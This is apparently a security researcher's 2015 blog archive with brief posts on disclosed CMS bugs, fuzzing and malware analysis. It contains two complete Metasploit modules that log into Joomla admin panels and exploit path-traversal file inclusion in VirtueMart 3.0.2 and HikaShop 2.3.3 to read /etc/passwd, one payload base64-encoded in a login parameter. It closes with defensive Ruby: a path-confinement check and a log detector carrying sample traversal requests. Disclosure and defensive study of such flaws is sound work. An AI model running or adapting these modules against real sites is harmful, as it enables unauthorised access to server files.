Sunday 27 December 2015

Joomla CVE-2015-7857 writeup

(I wrote this as a 'note' on 14.12.2015, but since all the information is already public,
below you will find a proof of concept and a little write-up for the vulnerability described in this CVE.)


Saturday 26 December 2015

New version of Lime Survey

As far as I know, LimeSurvey is already updated, so below you will find all the vulnerabilities I found nearly 2 months ago during some small 'code review' exercises.

Response from LimeSurvey Team was very fast! :)

Found: 4.11.2015
Sent:  5.11.2015
Resp:  5.11.2015

AFAIK all findings were fixed in 48h. So... here we go:

Saturday 24 October 2015

[EN] SOAP testing

During one of my last projects I needed to test some web services.

I was wondering: if I can do it with Burp or by manual testing,
maybe I can also write some quick code in Python...

And that's how I wrote soapee.py:


Friday 2 October 2015

My Java SIGSEGV's

During the last couple of days I was checking lcamtuf’s American Fuzzy Lop against some (“non-instrumented”) binaries.

I was wondering what would happen if I ran it against Java… ;)

I was looking for some sources, but unfortunately I wasn’t able to find any. The next thing was checking where I have Java installed (so I would know what/where I can check). My kind of ‘test lab’ was: Ubuntu 12, Kali Linux, WinXP, Win7. (The exact version of Java installed on those OSes you will find below.)

Friday 19 June 2015

[EN] Social engineering attacks during conference in Katowice

Thanks for watching and for all the questions during this conference ;)

The energy was great!

More details: http://www.tuv-nord.com/pl/pl/aktualnosci-436-1921.htm

See you next time.


o/


Wednesday 27 May 2015

SQLI in e107 CMS

During the last few weeks, in between other things, I was also doing some source code review.
That's how I found an SQLi bug in the admin panel of e107 CMS. After a fast response from the e107 Team,
a fix was created.

This bug was found in the e107_2.0_full_beta1 version. I don't know if other versions are also vulnerable.

Details about the vulnerability (even though it's in the admin panel) will not be published for now.

Stay in touch. ;)


Monday 25 May 2015

[EN] Browser exploitation during CybercomDev conference - Updated

This weekend I gave my first formal security presentation at CybercomDev in Poland.
I was talking about use-after-free exploits, fuzzing and browser exploitation.
Thank you for watching and for your support ;)


* Currently this presentation is available only on demand.

* Update - 16.07.2015 *
Video (PL) is available here. Thanks, Kenis. ;)


See you next time! ;)

o/





Tuesday 28 April 2015

[EN] Old nasm sigsegv 0day

Like before, I wrote another PoC to get a shell via an overflow in old nasm.
Check it out:

[EN] Flex 2.5.33 (2) 0days

I was testing some old bugs in one old distro, and that's how I found a SIGSEGV in flex (2.5.33).

Below is the proof of concept:

Monday 2 March 2015

[EN] Analysing malicious PDF - part 2

This time we will check 2 PDFs (because I decided that it would be more fun than just posting about one ;)). Besides that, those 2 files contain different methods for delivering the payload, so we will check all of them.

Sunday 1 March 2015

[EN] Analyzing Malicious PDF

Reading the Contagio blog I found a few examples of malicious PDF files.

Today we will check one of them. :)

During PDF analysis we will often use peepdf and Malzilla.
This time too, those tools will help us understand what's going on with
our PDF file.

Let's run peepdf on this file. As we can see, there is some JavaScript object.
Let's examine it with the "object 7" command:

[EN] Obfuscated case - JSredirector

Today we'll check some "obfuscated" JavaScript code. I found this example (named
'JSredirector') on this site. Thanks again! ;)

So... Unzip the file and you will find index.html with JS code.


Index.html contains encoded JS code:

Tuesday 24 February 2015

[EN] Malware analysis – Fake AV Downloader (part 1)

1.    Thanks for the sample file(s)

After writing my last article about malware analysis for Android[1], I decided to check some threats that may come from webpages. Today we see more advertising on the web than we did a few years ago. In the case of malicious pages, the “advertisements” added there now will more often than not try to steal your data by installing some malware on your computer or by redirecting you to a webpage containing exploit code for your browser (or its plugins).

A few nice examples of ‘webpages’ like this I found (again) on Mila’s great blog[0]. Thanks again! ;)

(Hint: Don’t ask me for the password. Ask Mila via email.)

[EN] Fun with American Fu(n)zzy Lop

In the last few days I was doing a little research about 'how this crazy afl works'. ;)
"American Fuzzy Lop" is an excellent tool created by lcamtuf.

Now it's a good moment to check the documentation of 'afl' if you want
some nice details about using it.

Wednesday 28 January 2015

[PL] Analysis of the atticlab.bodyscanner.apk application

In this short post I will explain how I checked what the atticlab.bodyscanner.apk application does. I found the file while browsing http://contagiodump.blogspot.com/ [1] - thanks for the samples!

Table of contents:

Sunday 18 January 2015

[EN] kmt.apk - what's this?

A few days ago I found an Android application named 'kmt.apk'.

I was wondering what this app is doing... To check it, I used apktool.

The file listing showed me AndroidManifest.xml, so I was hoping to find out
what this app needs to run. This is what I found:
AndroidManifest.xml

After seeing that this app needs my location (or the location of my phone),
I was curious where (all?) that data is going. This is what I found:

jd-gui in action

jd-gui in action - sending params...

jd-gui in action - sending params...

Another one:
onCreate function


And that's how I found this link :)

So it seems that this application is checking information about your location on your
phone and sending it to this "erotte" website. For now we're done here. ;)

If you have some nice APK files to analyse, let me know via email. Thanks.

Cheers,
o/

[EN] Checking Illusion Bot

I was checking other stuff, and suddenly found "Illusion Bot". Seems to be a small IRC DDoS Bot. ;]

Let's see...

Download:
You can easily find it on the web.

Unzipped, it looks like this:

Unzipped

I decided to check the web files first... but I don't understand all of it... ;]

Sorry - don't understand

So I decided to use the nice and friendly 'strings' command, combined with a few greps:

Commands to use for this bot
Of course in those PHP files (index.php and upgrade.php) you can find more things, like
how this backdoor installs itself on the WWW server, or how it sends commands, etc.

Bots tables
The base64-decoded files now look like this:



...and commands again:





Point of view from IDA:




And this is my favourite :D

can you see it? ;)




More, maybe soon. ;)

Cheers,
o/

Monday 12 January 2015

[EN] VirtueMart 3 - LFI for Metasploit

Following on from the last few posts, below you can find another small PoC exploit for an LFI vulnerability found in the latest (this time) VirtueMart (3.0.2).

Because it's for Joomla again, it's again based on the HikaShop LFI PoC.

Enjoy:

Preparing to exploit...

Raw results

And the code:
---<virtuemart_auth_lfi.rb>---

root@kali:/var/www# cat virtuemart_lfi.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'VirtueMart 3 - LFI poc for authenticated users',
      'Description' => %q{
        VirtueMart 3.0.2 is vulnerable to local file include attack.
        Authenticated user can read local files from the server.

        More here: https://twitter.com/HauntITBlog
      },
      'Author' =>
        [
          'HauntIT Blog', # Discovery
                          # MSF module (based on http://hauntit.blogspot.com/2015/01/en-hikashop-lfi-metasploit-module.html)
          'http://hauntit.blogspot.com'
        ],
      'License' => MSF_LICENSE,
      'Privileged' => false,
      'Platform'   => ['php'],
      'Arch'       => ARCH_PHP,
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '23.12.2014'))
    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
      ], self.class)
  end

  # no version fingerprinting in this poc
  def check
    Exploit::CheckCode::Unknown
  end

  # the Joomla form token is a 32-char hex string; take the first one found in the page
  def fetchMd5(my_string)
    if my_string =~ /([0-9a-fA-F]{32})/
      return $1
    end
    return nil
  end

  def exploit
    # 1st, we will get cookies and token
    req1 = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php')
    })
    # check the response before reading headers from it
    unless req1
      fail_with(Failure::Unreachable, "[-] Failed with 1st request")
    end
    cookies = req1['set-cookie'].to_s

    print_status("[+] Good: " + req1.code.to_s)
    print_good("[+] Got cookie(s): " + cookies)

    token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
    if req1.body =~ token_pattern
      token = fetchMd5(req1.body)
      print_good("[+] Got token: " + token.to_s)
    else
      print_status("[-] Token not found")
    end

    # now we need to do auth using that token and cookies
    print_status("[+] Trying to auth...")

    auth = send_request_cgi({
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'cookie'        => cookies,
        'vars_post'     => {
                'username'      => datastore['USERNAME'],
                'passwd'        => datastore['PASSWORD'],
                'option'        => 'com_login',
                'task'          => 'login',
                'return'        => 'aW5kZXgucGhwP29wdGlvbj1jb21fdmlydHVlbWFydCZ2aWV3PWxvZyZ0YXNrPWVkaXQmbG9nZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
                token.to_s => 1
        }
    })
    unless auth
      fail_with(Failure::Unreachable, "[-] No response to the auth request")
    end

    print_good("[+] Code after auth: " + auth.code.to_s)

    # 3rd step: get + post params to lfi
    print_good('[+] Exploit...')
    readthis = "../../../../../../../../../../../../../../../../../../etc/passwd"

    xpl = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'vars_get'      => {
                 'option'   => 'com_virtuemart',
                 'view'     => 'log',
                 'task'     => 'edit',
                 'logfile'  => readthis
        },
        'cookie'        => cookies
    })

    if xpl
      print_good("[+] Exploit response code: " + xpl.code.to_s)
      print_good("[+] Response body after attack:")
      print_status(xpl.body)
    else
      fail_with(Failure::Unknown, "[-] Cannot exploit it :C")
    end
  end # exploit

end

---<virtuemart_auth_lfi.rb>---

Pastebin version is here.


Cheers,
o/

Saturday 3 January 2015

[EN] HikaShop LFI - Metasploit module

Nearly 2 weeks ago I wrote a little article about vulnerabilities in multiple plugins for Joomla.

There we talked about creating your own proof of concept for Metasploit. So now should be a good time to prepare something more useful.

Below you will find a dirty MSF PoC for the LFI vulnerability located in HikaShop 2.3.3. ;)

Let me know if your Joomla is vulnerable. ;) If you have any trouble running this PoC,
just check how I did it before, or feel free to contact me with any questions/suggestions.

Loading exploit:

Running:





... and finally we will get the content of /etc/passwd:




Code:
---<hikashop_auth_lfi.rb>---
root@kali:/var/www/pocs# cat hikashop_auth_lfi.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'HikaShop - LFI poc for authenticated users',
      'Description' => %q{
        HikaShop 2.3.3 is vulnerable to local file include attack.
        Authenticated user can read local files from the server.

        Vulnerability was described on https://twitter.com/HauntITBlog
      },
      'Author' =>
        [
          'HauntIT Blog', # Discovery / msf module
          'http://hauntit.blogspot.com'
        ],
      'License' => MSF_LICENSE,
      'Privileged' => false,
      'Platform'   => ['php'],
      'Arch'       => ARCH_PHP,
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '03.01.2015'))
    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
        # registered but not used by this poc
        OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ),
      ], self.class)
  end

  # no version fingerprinting in this poc
  def check
    Exploit::CheckCode::Unknown
  end

  # the Joomla form token is a 32-char hex string; take the first one found in the page
  def fetchMd5(my_string)
    if my_string =~ /([0-9a-fA-F]{32})/
      return $1
    end
    return nil
  end

  def exploit
    # 1st, we will get cookies and token
    req1 = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php')
    })
    # check the response before reading headers from it
    unless req1
      fail_with(Failure::Unreachable, "[-] Failed with 1st request")
    end
    cookies = req1['set-cookie'].to_s

    print_status("[+] Resp code: " + req1.code.to_s)
    print_good("[+] Cookie(s) : " + cookies)

    token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
    if req1.body =~ token_pattern
      token = fetchMd5(req1.body)
      print_good("[+] Token : " + token.to_s)
    else
      print_status("[-] Token not found")
    end

    # now we need to do auth using that token and cookies
    print_status("[+] 2nd request (post with auth)")

    auth = send_request_cgi({
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'cookie'        => cookies,
        'vars_post'     => {
                'username'      => datastore['USERNAME'],
                'passwd'        => datastore['PASSWORD'],
                'option'        => 'com_login',
                'task'          => 'login',
                'return'        => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
                token.to_s => 1
        }
    })
    unless auth
      fail_with(Failure::Unreachable, "[-] No response to the auth request")
    end

    print_good("[+] Code after auth: " + auth.code.to_s)

    # 3rd step: get + post params to lfi
    print_status('[+] and now 3rd request...')
    xpl = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'vars_get'      => {
                 'option'   => 'com_hikashop',
                 'ctrl'     => 'view',
                 'task'     => 'edit',
                 'id'       => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd'
        },
        'cookie'        => cookies
    })

    if xpl
      print_good("[+] 3rd response code: " + xpl.code.to_s)
      print_good("[+] 3rd (full) response body:")
      print_status(xpl.body)
    else
      fail_with(Failure::Unknown, "[-] Cannot exploit it :C")
    end
  end # exploit

end
 
---<hikashop_auth_lfi.rb>---

And pastebin version is here.
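Both Metasploit modules on this page (the VirtueMart one earlier and the HikaShop one just above) rely on the same weakness: a user-supplied file name ("logfile" in VirtueMart, the last "|"-separated part of "id" in HikaShop) reaches the component without being confined to a directory, and the modules additionally carry the traversal target base64-encoded inside Joomla's login "return" parameter. The Ruby below is an added example, not code from this blog or from the HikaShop/VirtueMart projects. It shows the confinement check such code needs (resolve the name under a base directory and refuse anything that escapes it, including NUL-byte truncation) and a detector that runs over constructed access-log lines, URL-decoding each parameter and base64-decoding values that look like a login "return" target. The base directory /var/www/logs, the hosts, timestamps and the com_example component name are all constructed placeholders.

```ruby
require 'pathname'
require 'base64'
require 'cgi'

# --- 1. Mitigation: confine a user-supplied file name to a base directory -----
#
# Returns the resolved absolute path when +requested+ stays inside +base+, and
# nil when it escapes (".." climbing or an absolute path) or carries a NUL byte.
# Pathname#+ and #cleanpath resolve ".." lexically, so nothing on disk is touched
# and the decision is made before any open() happens (symlinks are not followed;
# use realpath on an existing base if that matters in your deployment).
def confine_to_base(base, requested)
  base_path = Pathname.new(base).cleanpath
  candidate = (base_path + requested).cleanpath
  candidate.to_s.start_with?("#{base_path}/") ? candidate.to_s : nil
rescue ArgumentError
  # Pathname refuses strings containing "\0", the classic suffix-truncation trick
  nil
end

# --- 2. Detection: traversal in request parameters, including base64 values ----

TRAVERSAL_RE = %r{\.\.[/\\]}                  # "../" or "..\" anywhere in a decoded value
BASE64_RE    = %r{\A[A-Za-z0-9+/]{8,}={0,2}\z}

# URL-decode every query value; values that look like base64 (the way Joomla's
# login form carries its "return" target) are decoded a second time and checked too.
def decoded_values(raw_query)
  raw_query.to_s.split('&').flat_map do |pair|
    _name, value = pair.split('=', 2)
    value = CGI.unescape(value.to_s)
    value.match?(BASE64_RE) ? [value, Base64.decode64(value)] : [value]
  end
end

# +log_line+ is a combined-format access-log line. Returns the first decoded
# value containing a traversal sequence, or nil for a clean request.
def traversal_in_request(log_line)
  m = log_line.match(/"(?:GET|POST) (\S+) HTTP/)
  return nil unless m
  path, query = m[1].split('?', 2)
  ([CGI.unescape(path)] + decoded_values(query)).find { |v| v.match?(TRAVERSAL_RE) }
end

# Constructed sample log lines (placeholder hosts, dates and component name)
SAMPLE_LOG = [
  # a legitimate request to a log viewer
  '10.0.0.5 - - [03/Jan/2015:10:00:00 +0000] "GET /joomla/administrator/index.php' \
  '?option=com_example&view=log&logfile=today.log HTTP/1.1" 200 512',
  # traversal, percent-encoded the way an HTTP client library sends it
  '10.0.0.9 - - [03/Jan/2015:10:00:01 +0000] "GET /joomla/administrator/index.php' \
  '?option=com_example&view=log&logfile=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
  # the same target hidden in a base64-encoded login "return" parameter
  '10.0.0.9 - - [03/Jan/2015:10:00:02 +0000] "GET /joomla/administrator/index.php' \
  "?option=com_login&return=#{CGI.escape(Base64.strict_encode64(
    'index.php?option=com_example&view=log&logfile=../../../etc/passwd'))} HTTP/1.1\" 303 0"
]

# Lines worth an alert, paired with the decoded value that triggered the match
def flagged_lines(lines = SAMPLE_LOG)
  lines.each_with_object([]) do |line, out|
    hit = traversal_in_request(line)
    out << [line, hit] if hit
  end
end

if __FILE__ == $PROGRAM_NAME
  p confine_to_base('/var/www/logs', 'today.log')
  p confine_to_base('/var/www/logs', '../../../../../../etc/passwd')
  flagged_lines.each { |line, hit| puts "ALERT #{hit.inspect} <- #{line}" }
end
```

The confinement check is done on the cleaned path string rather than by looking for "../" in the input, so encoded or doubled-up variants are handled by the same comparison; the detector, by contrast, has to decode before matching, which is why it unescapes each value and also tries a base64 round-trip.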

Happy New Year! ;)